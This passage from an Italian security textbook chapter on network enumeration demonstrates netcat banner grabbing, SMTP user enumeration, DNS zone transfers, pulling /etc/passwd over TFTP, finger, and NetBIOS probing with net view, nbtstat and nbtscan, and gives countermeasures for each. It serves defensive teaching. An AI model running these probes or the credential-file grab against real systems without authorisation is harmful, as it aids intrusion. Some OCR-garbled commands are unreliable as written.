Weld Pond quando lavorava con il gruppo di ricerche sulla sicurezza LOpht. netcat 
può essere scaricato da http://www.atstake.com/research/tool/index.html. 
Come vedrete durante la lettura di questo libro, netcat è giustamente famoso tra gli 
amministratori di sistemi per le sue caratteristiche ingegnose di flessibilità. Quando 
viene utilizzato dal nemico, i suoi effetti sono semplicemente devastanti. Qui ne 
esamineremo una delle applicazioni più semplici, la connessione a una porta 
TCP/IP remota e l'enumerazione dei banner del servizio: 


C:\>nc -v www.corleone.com 80 

ww.corleone.com [192.168.45.7] 80 (?) open 

Generalmente in questo caso è sufficiente un input molto semplice per generare 
una risposta di qualche tipo; quando si preme Invio si ottiene la risposta seguente: 


HTTP/1.1 400 Bad Request 

Server: Microsoft-IIS/4.0 

Date: Sat, 03 Apr 1999 08:42:40 GMT 
Content-Type: text/html 
Content-Length: 87 


<html><head><title>Error</title></head> 
<body>The parameter is incorrect.</body> 
</html> 


Nel file readme di netcat c’è un suggerimento che spiega come reindirizzare il con- 
tenuto di un file verso netcat per sollecitare sistemi remoti, allo scopo di ottenere 
ulteriori informazioni. Per esempio, si può creare un file di testo chiamato nudge. 
txt contenente la stringa GET/HTTP/1.0, seguita da due carriage return e, infine, 
dalle seguenti righe: 


[root$]nc -nvv -o banners.txt 192.168.202.34 80 < nudge.txt 
HTTP/1.0 200 OK 

Server: Sun _WebServer/2.0 

Date: Sat, 10 Apr 1999 07:42:59 GMT 

Content-Type: text/html 

Last-Modified: Wed, 07 Apr 1999 15:54:18 GMT 

ETag: "370a7fbb-2188-4" 

Content-Length: 8584 


66 Capitolo 3 


<HTML> 
<HEAD> 

<META NAME="keywords" CONTENT"=igCorp, hacking, security"> 

<META NAME="description" CONTENT="Welcome to igCorp's Web site. "> 
=BigCorp is a leading manufacturer of security holes. 


<TITLE>BigCorp Corporate Home Page</TITLE> 


</HEAD 
</HTML> 


È opportuno utilizzare per netcat l'argomento -n quando si specificano 
indirizzi IP numerici come bersaglio. 


State pensando a un buon metodo di attacco per Sun WebServer 2? Avete afferrato 
il concetto. Altri metodi per creare file di questo tipo includono HEAD /HTTP/1.0 
<cr><cr>, QUIT <cr>, HELP <cr>, ECHO <cr> e anche semplicemente un paio di 
carriage return (<cr>), in base al servizio che viene sondato. 

Queste informazioni possono aiutare notevolmente l’intruso a compromettere un si- 
stema, indirizzando i suoi sforzi. Ora che l'aggressore conosce il fornitore e la ver- 
sione del software del server, può concentrarsi su tecniche specifiche della piatta- 
forma in questione e su routine note di exploit, provandole finché non trova quella 
giusta. Il tempo lavora a suo favore e contro l'amministratore di questa macchina. 
Sentirete ancora parlare di netcat nel prosieguo di questo libro. 


Contromisure alla cattura dei banner 


Come abbiamo già rilevato, la migliore difesa contro la cattura dei banner è disabili- 
tare i servizi non indispensabili. In alternativa, occorre limitare l'accesso ai servizi 
che utilizzano il controllo degli accessi alla rete. Probabilmente, l'esecuzione di ser- 
vizi software vulnerabili è la via di penetrazione più facile in qualsiasi ambiente; 
pertanto, queste contromisure devono essere adottate in ogni caso, non solo per 
contrastare la cattura dei banner. 

I servizi di importanza vitale per l’attività di un'azienda non possono essere sempli- 
cemente disattivati. In questo caso, dovete adottare un metodo appropriato per di- 
sabilitare la visualizzazione del fornitore e della versione nei banner. Effettuate pe- 
riodicamente voi stessi alcune verifiche mediante scansioni delle porte e connessio- 
ni netcat rudimentali con le porte attive, accertandovi che non siano fornite infor- 
mazioni inopportune all’aggressore. 

Per ulteriori suggerimenti su come eliminare queste falle, visitate il sito ufficiale di 
Canadian Security Consultants PGCI, Inc all’indirizzo http://ww.pgci.ca/common/ 
p_fingerprint.htm. 

Questo sito, oltre a ospitare un’interessante discussione sulle difese contro le ricer- 
che nei sistemi operativi effettute tramite fingerprinting (si veda il Capitolo 2), ripor- 
ta esempi di contromisure per le tecniche di enumerazione dei banner su server 
sendmail, FTP, telnet e Web. 
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Enumerazione dei servizi di rete comuni 


Utilizzeremo alcune di queste tecniche di enumerazione di base, e molte altre, per 
enumerare servizi comunemente controllati da scansioni delle porte effettuate in si- 
tuazioni reali. 


® Enumerazione mediante SMTP, porta TCP 25 
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Una delle tecniche maggiormente diffuse di enumerazione è quella basata sul lin- 
guaggio comunemente utilizzato per l'invio di posta elettronica, l'SMTP (Simple 
Mail Transfer Protocol), che tipicamente viene eseguito sulla porta TCP 25. L'SMTP 
è dotato di due comandi incorporati che consentono l’enumerazione degli utenti: 
VRFY, che conferma i nomi degli utenti validi, e EXPN, che rivela gli indirizzi effettivi 
di recapito per gli alias e le mailing list. Sebbene attualmente la maggior parte delle 
aziende fornisca tranquillamente indirizzi di posta elettronica, consentendo questa 
attività sul vostro server di posta rischiate di fornire all’intruso informazioni preziose 
sugli utenti e gli offrite la possibilità di contraffare i messaggi. Nell'esempio seguen- 
te utilizziamo telnet per illustrare l'enumerazione SMTP; 


[root$]telnet 192.168.202.34 25 

Trying 192.168.202.34... 

Connected to 192.168.202.34. 

Escape character is '*]'. 

220 mail.bigcorp.com ESMTP Sendmail 8.8.7/8.8.7; 11 Apr 2002 
vrfy root 

250 root <root@bigcorp.com> 

expn adm 

250 adm <adm@bigcorp.com> 

quit 

221 mail.,bigcorp.com closing connection 


Contromisure all’enumerazione mediante SMTP 


Questa è un’altra delle funzionalità non recenti ma utili che devono essere disattiva- 
te. Le versioni del popolare software per server SMTP, sendmail (http://www. sen- 
dmail.org), successive alla 8 prevedono una sintassi incorporabile nel file mail.cf 
per disabilitare questi comandi, o richiedere l’autenticazione. Exchange Server di 
Microsoft, nelle versioni più recenti, consente di impedire di default agli utenti sen- 
za privilegi l'utilizzo di EXPN e VRFY. Altre implementazioni del server SMTP saranno 
probabilmente dotate di funzionalità simili; in caso contrario, forse è consigliabile 
passare a un altro fornitore! 
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vito 


Come abbiamo visto nel Capitolo 1, una delle fonti principali di informazioni di 
profilo è il DNS (Domain Name System), il protocollo standard di Internet per asso- 
ciare agli indirizzi IP nomi semplici da ricordare, come Amazon.com. Una delle tec- 
niche di enumerazione più datate presentate in questo libro è quella dei trasferi- 
menti di zona DNS, che può essere utilizzata contro server DNS non configurati cor- 
rettamente, tramite la porta TCP 53. I trasferimenti di zona provocano il dump 
dell'intero contenuto dei file di zona di un determinato dominio, enumerando infor- 
mazioni quali le mappature delle corrispondenze hostname-indirizzo IP, nonché i 
dati HINFO (si veda il Capitolo 1). 

Se sul server obiettivo sono eseguiti servizi Microsoft DNS per supportare AD (Acti- 
ve Directory, una funzionalità introdotta dopo Windows NT4), l'aggressore ha buo- 
ne probabilità di raccogliere ulteriori informazioni. Poiché lo spazio dei nomi di AD 
si basa sul DNS, l'implementazione Microsoft dei server DNS pubblicizza l’esistenza 
di servizi per domini quali AD e Kerberos che utilizzano il record DNS SRV (RFC 
2052); questo record consente l'individuazione dei server mediante il tipo di servi- 
zio fornito (per esempio, LDAP, FTP o WWW) e del protocollo (per esempio, TCP). 
Di conseguenza, un semplice trasferimento di zona (nslookup, 1s -d <domainname>) 
può enumerare numerose informazioni di rete interessanti, come mostrato nel se- 
guente trasferimento di zona di esempio eseguito sul dominio labfarce.org (per mo- 
tivi di spazio, è stato lievemente modificato): 


C:\>nslookup 
Default Server: corp-dc.labfarce.org 
Address: 192.168.234.110 
> ls -d labfarce.org 
{[192.168.234.110]] 
labfarce.org. SOA corp-dc.labfarce.org admin. 


labfarce.org. A 192.168.234.110 
labfarce.org. NS corp-dc.labfarce.org 
_Qe._tcp SRV priority=0, Wweight=100, port=3268, corp-dc.labfarce.org 


_kerberos._tcp SRV priority=0, weight=1009, port=88, corp-dc.labfarce.org 
_kpasswd._tcp SRV priority=0, weight=100, port=464, corp-dc.labfarce.org 
_ldap._tcp SRV priority=0, weight=100, port=389, corp-dc.labfarce.org 


In base alla RFC 2052, il formato dei record SRV è: 
Service.Proto.Name TTL Class SRV Priority Weight Port Target 


Alcune semplici indicazioni che un hacker potrebbe ricavare da questo file sono 
l'ubicazione del servizio Global Catalog del dominio (_ge._tep), i controllori di do- 
minio che utilizzano l'autenticazione Kerberos (_kerberos._tcp), i server LDAP 
(_1dap._tcp) e i numeri di porta associati (vengono mostrate solo le incarnazioni 
TCP). 
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Blocco dei trasferimenti di zona DNS 


Questo problema può essere risolto facilmente consentendo i trasferimenti di zona 
solo a macchine autorizzate (di solito, queste sono server DNS di backup). Fortuna- 
tamente, le implementazioni del DNS successive alla versione NT4 di Windows 
consentono di limitare in modo semplice i trasferimenti di zona, come mostrato nel- 
la figura seguente: per visualizzare la finestra di dialogo illustrata si deve seleziona- 
re l'opzione Proprietà di una forward lookup zone (in questo caso, labfarce.org), 
dallo snap-in Gestione Computer dellMMC (Microsoft Management Console), in 
Strumenti di amministrazione\DNS\[nome_server]\Zone di ricerca diretta\/nome_ 
zona)\Proprietà. 


La configurazione predefinita di Win 2000, sicuramente l’avete intuito, consente il 
trasferimento di zona a qualsiasi server. Se lo si desidera è possibile impedire com- 
pletamente il trasferimento di zona, deselezionando la casella Allow Zone Transfers, 
anche se probabilmente è più realistico ipotizzare che i server DNS di backup deb- 
bano essere mantenuti aggiornati. Questo è il motivo per cui abbiamo illustrato 
un'opzione meno restrittiva. 


In parte grazie alla segnalazione di questo problema nell'edizione prece- 
dente di questo libro, Microsoft ba intenzione di rilasciare l’implementazio- 
ne DNS di Windows .NET Server con un'impostazione di default che blocca 
i trasferimenti di zona verso indirizzi non autorizzati. 
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L'acquisizione del file /etc/passwd, di cui discuteremo ampiamente nel Capitolo 7, 
è il capostipite di tutti gli stratagemmi di enumerazione su UNIX/Linux, sebbene 
non possa essere definito un semplice stratagemma di enumerazione vista la critici- 
tà delle informazioni raccolte. Tuttavia, ci sembra opportuno rammentare che uno 
dei metodi più diffusi per catturare il file passwd è il ricorso al protocollo TFTP (Tri- 
vial File Transfer Protocol), che viene generalmente eseguito sulla porta UDP 69. 
Come mostrato di seguito, è un gioco da ragazzi catturare tramite TFTP un file 
letc/passwd praticamente privo di protezioni: 


[root$]tftp 192.168.202.34 

tftp> connect 192.168.202,34 

tftp> get /etc/passwd /tmp/passwd.cracklater 
tftp> quit 


A parte il fatto che ora i nostri aggressori dispongono del file passwd su cui eseguire 
il cracking a loro piacimento, essi possono leggere gli utenti direttamente da questo 
file. 


(©) Contromisure all’enumerazione mediante TFTP 


Il TFIP è un protocollo intrinsecamente non sicuro: esso viene eseguito in chiaro 
sulla rete, non prevede alcun meccanismo di autenticazione e può contenere ACL 
di file system non configurate correttamente e quindi a totale disposizione dei ma- 
lintenzionati. Per questi motivi, non utilizzatelo; in caso contrario, proteggetelo con 
restrizioni agli accessi (utilizzando un tool quale TCP Wrappers), limitate l’accesso 
alla directory /tftpboot e accertatevi che sia bloccato in corrispondenza del 
firewall perimetrale. 


LC) finger, porta TCP/UDP 79 
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Forse il trucco più vecchio citato nel libro per quanto riguarda l'enumerazione degli 
utenti è l’utility finger per UNIX/Linux. finger era un metodo pratico per fornire 
automaticamente informazioni agli utenti in un’epoca in cui Internet era molto più 
piccola e priva di pericoli. Ne parliamo principalmente per descrivere l'impronta 
dell’attacco, poiché molti tool per attacchi a script sfruttano ancora questa vulnera- 
bilità e molti amministratori di sistemi ignari lasciano che finger sia eseguito in 
configurazioni con sicurezza minima. Anche in questo caso, l'esempio seguente 
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presuppone che nelle scansioni precedenti sia stato identificato un host valido su 
cui viene eseguito il servizio finger (porta 79): 


[root$]finger -1 @target.hackme.com 


[target.hackme.com] 
Login: root Name: root 
Directory: /root Shell: /bin/bash 
On since Sun Mar 28 11:01 (PST) on ttyl 11 minutes idle 
(messages off) 
On since Sun Mar 28 11:01 (PST) on ttyp@ from :0.0 
3 minutes 6 seconds idle 
No mail. 
Plan: 
John Smith 
Security Guru 
Telnet password is my birthdate. 


Anche finger @@hostname può fornire ottime informazioni: 
[root$]finger 0@192.168.202.34 


[192.168.202.34] 


Line User Host(s) Idle Location 
ui vity O idle 0 192.168.202,14 
Sed Sync PPP 00:00:02 


Come potete vedere, la maggior parte delle informazioni visualizzate da finger è 
piuttosto innocua (esse vengono derivate dagli opportuni campi /etc/passwd, se 
esistono). Probabilmente l'informazione più pericolosa contenuta nell’output di 
finger è quella dei nomi degli utenti connessi al sistema e dei tempi di inattività, 
che indica agli aggressori chi sta osservando il traffico (root?) e quanto è attento. Al- 
tre informazioni possono essere utilizzate in un attacco di “ingegneria sociale” (ter- 
mine utilizzato dagli hacker per indicare i tentativi di accesso fraudolento effettuati 
applicando abilità “sociali”: si veda il Capitolo 14). Come si nota nell'esempio pre- 
cedente, gli utenti che inseriscono un file .plan o .project nelle loro home di- 
rectory rischiano di far trapelare informazioni preziose come conseguenza di un 
sondaggio anche semplice. (I contenuti di questi file sono visualizzati nell’output 
dei sondaggi effettuati con finger, come mostrato in precedenza.) 


Contromisure a finger 


L'individuazione e il blocco di questa fuga di informazioni è semplice: è sufficiente 
non eseguire finger (lo potete trasformare in un commento in inetd.conf e kil- 
lall -HUP inetd) e bloccare la porta 79 in corrispondenza del firewall. Se proprio 
dovete concedere l’accesso a finger, utilizzate TCP Wrappers (si veda il Capitolo 7) 
per limitare e registrare l’accesso all’host, oppure utilizzate un daemon di finger 
modificato che fornisce unicamente informazioni limitate. 
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L'enumerazione della marca e del modello di un server Web è una delle tecniche 
più semplici e diffuse tra gli hacker. Ogniqualvolta viene pubblicizzato un nuovo 
exploit di server Web (per esempio, il buffer overflow di ida/idq che è servito da 
base per i worm Code Red e Nimda), i malintenzionati utilizzano semplici tool di 
enumerazione automatizzati per ispezionare vaste zone di Internet alla ricerca di 
software potenzialmente vulnerabile. Non pensate di farla franca. 

All’inizio di questo capitolo, nel paragrafo “Strumenti elementari per la cattura dei 
banner: telnet e netcat”, abbiamo illustrato la cattura elementare di banner HTTP; vi 
abbiamo inoltre spiegato come connettervi a un server Web sulla porta HTTP stan- 
dard (TCP 80) mediante netcat e come estrarre il banner con qualche carriage re- 
turn. Per un hacker più scaltro, il metodo basato su HTTP HEAD è un modo pulito 
per carpire le informazioni dei banner. Potete digitare questo comando direttamen- 
te dopo esservi connessi con netcat al server bersaglio, come mostrato di seguito (i 
comandi che devono essere inseriti sono in neretto; dovete digitare due o più car- 
riage return dopo la riga contenente il comando HEAD): 


C:\>nc -v www.corleone.,com 80 
www.corleone.com [192.168.45.7] 80 (?) open 
HEAD / HTTP/1.0 


HTTP/1.1 200 OK 

Server: Microsoft-IIS/5.0 

Date: Tue, 08 May 2001 00:52:25 GMT 

Connection: Keep-Alive 

Content-Length: 1270 

Content-Type: text/html 

Set-Cookie: ASPSESSIONIDGGOAGQLAO=IPGFKBKDGDPOOHCOHIKOAKHI; path=/ 
Cache-control: private 


Nell'esempio precedente abbiamo illustrato la richiesta HTTP HEAD, attualmente 
poco diffusa, a parte l'eccezione rimarchevole dei worm. Pertanto, alcuni sistemi di 
intercettazione delle intrusioni potrebbero entrare in azione in seguito a una richie- 
sta HEAD. 

Inoltre, se vi imbattete in un sito Web che utilizza l’SSL non preoccupatevi, poiché 
netcat non può negoziare connessioni SSL. È sufficiente che lo reindirizziate trami- 
te uno dei molti tool SSL proxy disponibili, per esempio openssl o sslproxy. 
Occorre ricordare che nel codice sorgente HTML per le pagine Web è possibile tro- 
vare molte informazioni interessanti. Uno dei nostri tool preferiti per l’analisi di inte- 
ri siti (che dispone di altre eccellenti funzionalità di interrogazione delle reti) è Sam 
Spade di Blighty Design (http://samspade.org/ssw/). La Figura 3.1 mostra come 
Sam Spade può perlustrare interi siti Web e cercare nelle pagine informazioni di 
grande interesse quali la parola “password”. 

L'analisi dell’HTML alla ricerca di informazioni interessanti sconfina nel territorio 
dell’hacking del Web, che illustreremo nel Capitolo 15. 
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Figura 3.1 


La funzionalità Crawl Website di Sam Spade facilita il parsing di interi siti alla ricerca 
di informazioni interessanti quali le password. 


Contromisure all’enumerazione mediante HTTP 


Il metodo migliore per scoraggiare questo tipo di attività consiste nel cambiare il 
banner dei server Web. La procedura per effettuare questa operazione varia in base 
al fornitore del server Web: in questo libro verrà illustrata facendo riferimento a uno 
di quelli più comuni, cioè IIS (nternet Information Services) di Microsoft. IIS è 
spesso criticato soprattutto a causa della facilità con cui è possibile reperire exploit 
pronti all’uso per indebolire punti vulnerabili, quali MDAC (Microsoft Date Access 
Components), Unicode e il buffer overflow dell'Internet Printing Protocol (si veda il 
Capitolo 15). Combinate queste tecniche con worm IIS automatizzati quali Code 
Red e Nimda e capirete perché le scansioni su IIS sono diventate quasi uno sport 
nazionale su Internet. La modifica del banner IIS può essere di notevole aiuto per 
sparire dallo schermo radar di alcuni malintenzionati. 

Malauguratamente, la modifica diretta del banner IIS implica l'editing in esadecimale 
della DLL contenente il banner IIS, %systemroot%\sistemi32\inetsrv\w3svc.dll. Que- 
Sta può essere una procedura complessa, resa più difficile dal fatto che su Windows 
2000 questa DLL è protetta mediante SFP (Windows System File Protection) e viene so- 
stituita automaticamente da una copia pulita, a meno che l'SFP non sia disattivato. 


De] 
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C'è un altro metodo per modificare il banner IIS: l'installazione di un filtro ISAPI 
creato per definire il banner mediante il richiamo della funzione SetHeader. L'arti- 
colo di Microsoft Knowledge Base, consultabile all'indirizzo http://support.mi- 
crosoft.com/default.aspx?scid=kb;en-us;Q294735, spiega come è possibile effet- 
tuare questa operazione, con un esempio di codice sorgente. In alternativa, potete 
scaricare e utilizzare URLScan di Microsoft, incluso nell’IISLockdown Tool (http: // 
ww.microsoft.com/technet/security/tool/tool/locktool.asp). URLScan è un fil- 
tro ISAPI che può essere programmato per bloccare molti tipi di attacchi IIS prima 
che raggiungano il server Web; vi consente inoltre di configurare un banner perso- 
nalizzato per trarre in inganno aggressori sprovveduti e worm automatizzati. 


® Enumerazione mediante MSRPC, porta TCP 135 


Diffusione: 7 
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Su alcuni sistemi Microsoft Windows viene eseguito un servizio endpoint mapper (0 
portmapper) RPC (Remote Procedure Call) sulla TCP 135, chiamato MSRPC (Micro- 
soft RPC). L'invio di query a questo servizio può fornire informazioni su applicazioni 
e servizi disponibili sulla macchina bersaglio, nonché altre informazioni potenzial- 
mente utili all'aggressore, Il tool epdump di Reskit interroga l’endpoint mapper MSR- 
PC e mostra servizi vincolati a indirizzi IP e numeri di porte (sebbene in una forma 
molto rudimentale). Ecco un esempio del suo funzionamento contro un sistema su 
cui viene eseguita la TCP 135 (il codice è stato modificato per motivi di spazio): 


C:\>epdump mail.victim.com 

binding is 'ncacn_ip_tcp:mail.victim.com' 

int 82ad4280-036b-11cf-972c-00aa006887b0 v2.0 
binding 00000000-etc.@ncalrpc:[INETINFO LPC] 
annot '' 

int 82ad4280-036b-11cf-972c-00aa006887b0 v2.0 
binding 00000900-etc.@ncacn_ip_tcp: 216.154.242.126[1051] 
annot '' 

int 82ad4280-036b-11cf-972c-00aa006887b0 v2.0 
binding 00000000-etc.@ncacn_ip_tcp:192,168.10.2[1051] 
annot '' 

no more entries 


È importante rilevare che in questo output vediamo due numeri che assomigliano a 
indirizzi IP: 216.154.242.126 e 192.168.1.2. Si tratta di indirizzi IP a cui le applicazio- 
ni MSRPC sono vincolate. C'è un fatto ancora più interessante: il secondo di questi è 
un indirizzo RFC 1918, il che indica che probabilmente questa macchina ha due in- 
terfacce fisiche (0, come si suol dire, è dual-bomed) e una di queste è una rete in- 
terna. Questo aspetto può suscitare l'interesse di hacker curiosi che cercano ponti 
di questo tipo tra reti esterne e interne, in quanto punti importanti di attacco. 


a Un altro tool di enumerazione MSRPC di buon livello, chiamato rpedump 

(da non confondere con l'rpedump di Microsoft Reskit) e alcuni buoni 

articoli su questo argomento sono disponibili all'indirizzo http://ra- 
zor.bindview.com/tool/desc/rpctools1.0-readme.html. 
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Contromisure all’enumerazione MSRPC 


Stabilite restrizioni all'accesso alla porta TCP 135. Non c'è molto che potete fare per 
limitare la fuga di queste informazioni se questo servizio è disponibile: esso è pro- 
gettato per presentare questi dati (è proprio la funzione di un endpoint mapper). 
Questo aspetto diventa problematico quando Microsoft Exchange Server è affaccia- 
to su Internet. Affinché i client Outlook MAPI si possano connettere al servizio 
Exchange, devono prima contattare l'endpoint mapper. Pertanto, per assicurare la 
connettività Outlook/Exchange a utenti remoti su Internet, dovete lasciare la porta 
TCP 135 sguarnita. C'è una soluzione a questo problema: utilizzare un altro disposi- 
tivo per autenticare l’accesso alla TCP 135. Per esempio, alcuni firewall possono 
aprire automaticamente un’ACL a un determinato indirizzo IP remoto dopo che 
l'utente è riuscito ad autenticarsi con il firewall tramite un altro protocollo, per 
esempio l’HTTPS. Ovviamente, c'è un'alternativa: utilizzare OWA (Outlook Web Ac- 
cess) di Microsoft per supportare gli utenti remoti di Outlook. OWA è sostanzial- 
mente un'interfaccia con il Web di una casella postale Exchange e funziona con il 
protocollo HTTPS. Vi consigliamo di utilizzare un’autenticazione dettagliata se deci- 
dete di implementare OWA (per esempio, con certificati digitali o meccanismi di 
autenticazione a due fattori). 


0) Enumerazione mediante NetBIOS, porta UDP 137 
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L'NBNS (NeBIOS Name Service) era tradizionalmente utilizzato come sistema di asse- 
gnazione dei nomi distribuito per le reti basate su Microsoft Windows. A partire da 
Windows 2000, l'NBNS non è più necessario, poiché è stato sostituito in larga parte 
dallo standard di assegnazione dei nomi basato su Internet, il DNS. Tuttavia, nel mo- 
mento in cui scriviamo, l'NBNS è ancora attivato di default in tutte le distribuzioni di 
Windows; pertanto, in genere gli aggressori connessi al segmento di rete locale (o tra- 
mite un router che consente il tunneling di NBNS su TCP/IP) non hanno problemi a 
“enumerare la rete Windows”, come talvolta viene chiamata l’enumerazione NBNS. 
L’NBNS è una preda così facile perché i tool e le tecniche per monitorare la connes- 
sione NetBIOS sono facilmente disponibili: la maggior parte di esse è incorporata 
nel sistema operativo stesso! In effetti, generalmente le tecniche di enumerazione 
NBNS sondano l’NBNS su tutte le macchine presenti in rete e spesso sono così tra- 
sparenti da lasciare a stento trapelare che un utente è connesso a uno specifico ser- 
vizio sulla UDP 137. Parleremo per prima cosa dei tool nativi di Windows e poi pas- 
seremo a discutere di altri tool di terze parti. Eviteremo di parlare di contromisure 
prima di aver portato a termine questa discussione, poiché la soluzione di tutti que- 
sti problemi è piuttosto semplice e può essere realizzata in un solo colpo. 


Enumerazione dei gruppi di lavoro e dei domini Windows con net view 


Il comando net view è un ottimo esempio di strumento di enumerazione standard. 
Si tratta di un programma a riga di comando della famiglia Windows NT di straordi- 
naria semplicità, in grado di elencare i domini disponibili sulla rete e rilevare tutte le 
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macchine presenti in un certo dominio, Ecco come enumerare i domini della rete 
utilizzando net view: 


C:\>net view /domain 
Domain 


CORLEONE 

BARZINI_DOMAIN 

TATAGGLIA DOMAIN 

BRAZZI 

The command completed successfully. 


Il comando seguente elenca i computer del dominio specificato: 


C:\>net view /domain:corleone 


Server Name Remark 

\\VITO Make him an offer he can't refuse 
\\MICHAEL Nothing personal 

\\SONNY Badda bing badda boom 

\\FREDO I'm smart 

\\CONNIE Don't forget the cannoli 


Anche in questo caso, net view richiede l’accesso a NBNS su tutte le reti che devo- 
no essere enumerate, il che significa che generalmente funziona solo nei confronti 
del segmento di rete locale, Se l'NBNS è indirizzato su TCP/IP, net view può enu- 
merare i gruppi di lavoro Windows, i domini e gli host di un’intera azienda, metten- 
do a nudo la struttura dell’intera organizzazione con una singola interrogazione non 
autenticata proveniente da un qualsiasi sistema connesso fisicamente a una rete che 
riesca a ottenere un indirizzo DHCP. 


E Ricordate che possiamo utilizzare le informazioni ottenute con i ping sweep 

(si veda il Capîtolo 2) per sostituire gli indirizzi IP ai nomi NetBIOS delle 
singole macchine. Gli indirizzi IP e i nomi NetBIOS sono intercambiabili 
(per esempio, \\192.168.202.5 è equivalente a \\SERVER_NAME). Per como- 
dità, gli aggressori aggiungono spesso le voci appropriate al file *system- 
root%\system32\drivers\etc\LMHOSTS, accodando la sintassi #PRE, poi 
eseguono il comando nbtstat -R per ricaricare la cache della tabella dei 
nomi. A questo punto sono liberi di utilizzare il nome NetBIOS negli attac- 
chi successivi, sicuri che verrà mappato in modo trasparente all'indirizzo IP 
specificato in LMHOSTS. 


Enumerazione dei controllori di dominio Windows 


Per approfondire la nostra conoscenza della struttura della rete Windows, dovremo 
ricorrere a uno strumento presente nel Resource Kit di Windows (RK o Reskit). 
Nell'esempio seguente, vedremo come il tool RK chiamato nltest identifica i con- 
trollori di dominio nel dominio che abbiamo enumerato mediante net view (i con- 
trollori di dominio sono i custodi delle credenziali di autenticazione di rete di Win- 
dows e sono pertanto i principali bersagli degli hacker malintenzionati): 


C:\>nltest /dclist:corleone 
List of DCs in Domain corleone 
\\VITO (PDC) 
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\\MICHAEL 
\\SONNY 


The command completed successfully 


netdom di Reskit è un altro tool utile per l’enumerazione di informazioni critiche sui 
domini Windows su una rete, comprese l'appartenenza al dominio e le identità dei 
controllori di dominio di backup (BDC). 


Enumerazione dei servizi di rete con netviewx 


Il tool netviewx di Jesper Lauritsen (http://www.ibt.ku.dk/jesper/NTtools/) 
funziona in modo molto simile al comando net view, ma dispone della capacità di 
elencare server con servizi specifici. Noi utilizziamo spesso netviewx come sonda 
per cercare l’NT RAS (Remote Access Service) per avere un'idea del numero di server 
di accesso remoto esistenti su una rete, come mostrato nell'esempio seguente (la 
sintassi -D specifica il dominio da enumerare, mentre la sintassi -T specifica il tipo 
di macchina o di servizio da cercare): 


C:\>netviewx -D CORLEONE -T dialin_server 


VITO,4,0,500,nt%workstation%server%domain_ctrl%time source%dialin_server% 
backup_browser®master_browser," Make him an offer he can't refuse " 


I servizi in esecuzione su questo sistema sono elencati tra i simboli di percentuale 
(%). netviewx è anche un tool valido per scegliere bersagli diversi da controllori di 
dominio, che non sono protetti in modo adeguato. 


Lettura della tabella dei nomi NetBIOS con nbtstat e nbtscan 


nbtstat si connette a singole macchine anziché enumerare l’intera rete. Questo 
strumento consente di richiamare e leggere la tabella dei nomi NetBIOS di un siste- 
ma remoto. La tabella dei nomi contiene informazioni notevoli, come mostrato 
nell'esempio seguente: 


C:\>nbtstat -A 192.168.202.33 
NetBIOS Remote Machine Name Table 


Name Type Status 
SERVR9 <00> UNIQUE Registered 
SERVR9 <20> UNIQUE Registered 
9DOMAN <00> GROUP Registered 
9DOMAN <1E> GROUP Registered 
SERVR9 <03> UNIQUE Registered 
INet-Services <1C> GROUP Registered 
IS-SERVR9...... <00> UNIQUE Registered 
9DOMAN <1> UNIQUE Registered 
+*__MSBROWSE__.<01> GROUP Registered 
ADMINISTRATOR <03> UNIQUE Registered 


MAC Address = 00-A0-CC-57-8C-8A 


nbtstat consente di risalire al nome del sistema (SERVR9), al dominio di apparte- 
nenza (9DOMAN), agli eventuali utenti collegati (ADMINISTRATOR), agli eventuali 
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servizi in esecuzione (INet-Services) e all'indirizzo MAC. Queste entità possono es- 
sere identificate dai loro codici di servizio NetBIOS (il numero di due cifre a destra 
del nome), parzialmente elencati nella Tabella 3.1. 


Tabella 3.1 Codici dei servizi NetBIOS più comuni 


NetBIOS Code Risorsa 

<nome computer>[00] Servizio workstation 

<nome dominio >[00] Nome del dominio 

<nome computer>[03] Servizio messenger (per messaggi inviati al computer) 
<nome utente>[03] Servizio messenger (per messaggi inviati all'utente) 
<nome computer>[20] Servizio server 

<nome dominio>[1D] Browser master 

<nome dominio>[1E] Browser Service Elections 

<nome dominio>[1B] Domain Master Browser 


I due difetti principali di nbtstat risiedono nel fatto che può essere utilizzato su un 
solo host alla volta e che l'output generato è di difficile interpretazione. Entrambi 
questi inconvenienti sono stati affrontati ed eliminati dallo strumento gratuito nbt- 
scan, creato da Alla Bezroutchko e disponibile all'indirizzo http://www. 
inetcat.org/software/nbtscan.html. L'applicazione nbtscan è in grado di ese- 
guire la scansione delle denominazioni di un’intera rete in tempi rapidissimi, for- 
nendo un output decisamente più comprensibile: 


C:\>nbtscan 192.168.234.0/24 
Doing NBT name scan for addresses from 192.168.234.0/24 


IP address NetBIOS Name Server User MAC address 

192.168.234.36 WORKSTN12 <server> RSMITH 00-00-86-16-47-d6 
192.168.234.110 CORP-DC <server> CORP-DC 00-c0-4f-86-80-05 
192.168.234.112 WORKSTN15 <server> ADMIN 00-80-c7-0f -a5-6d 
192.168.234.200 SERVR9 <server> ADMIN 00-a0-cc-57-8c-8a 


Per combinazione, nbtscan è anche un metodo notevole per chiudere velocemente 
gli host di una rete che utilizzano Windows. Provate a utilizzarlo sul vostro campio- 
ne di classe C preferito di Internet e vedrete cosa intendiamo. 


Blocco dell’enumerazione del servizio nomi NetBIOS 


Tutte le tecniche precedenti agiscono sul servizio nomi NetBIOS, sulla UDP 137. Ne- 
gando l’accesso alla UDP 137 su singoli host o bloccando il protocollo in corrispon- 
denza dei router della rete, nessuna di queste attività avrà successo. Per impedire che i 
dati degli utenti appaiano nei dump delle tabelle dei nomi NetBIOS, occorre disattivare 
i servizi Alerter e Messenger sui singoli host. Il comportamento all'avvio di questi servi- 
zi può essere configurato tramite il pannello di controllo dei servizi. Su Windows 2000 
e versioni successive, potete disattivare il NetBIOS su TCP/IP nelle impostazioni per le 
singole schede di rete. Poiché non sempre abbiamo avuto successo nel bloccare l’enu- 
merazione NBNS mediante questa impostazione, non ci baseremo su di essa (inoltre, 
come vedrete nel prosieguo di questo capitolo, esistono molti pregiudizi su questa 
funzionalità). Infine, tenete presente che se bloccate la UDP 137 rispetto ai router di at- 
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traversamento, disattivate la risoluzione dei nomi Windows su questi router, impeden- 
do il funzionamento di qualsiasi applicazione basata sull'’NBNS. 


LL) Enumerazione di sessioni NetBIOS, portaTCP 139 


Diffusione: 8 
Semplicità: 10 
Impatto: 8 
Fattore di rischio: 9 


Windows NT e la sua famiglia sono meritatamente considerati divulgatori di infor- 
mazioni a beneficio di malintenzionati. Questo è dovuto quasi unicamente alla vul- 
nerabilità di cui stiamo per parlare, l’attacco a Windows con connessione a sessione 
nulla/connessione anonima. 


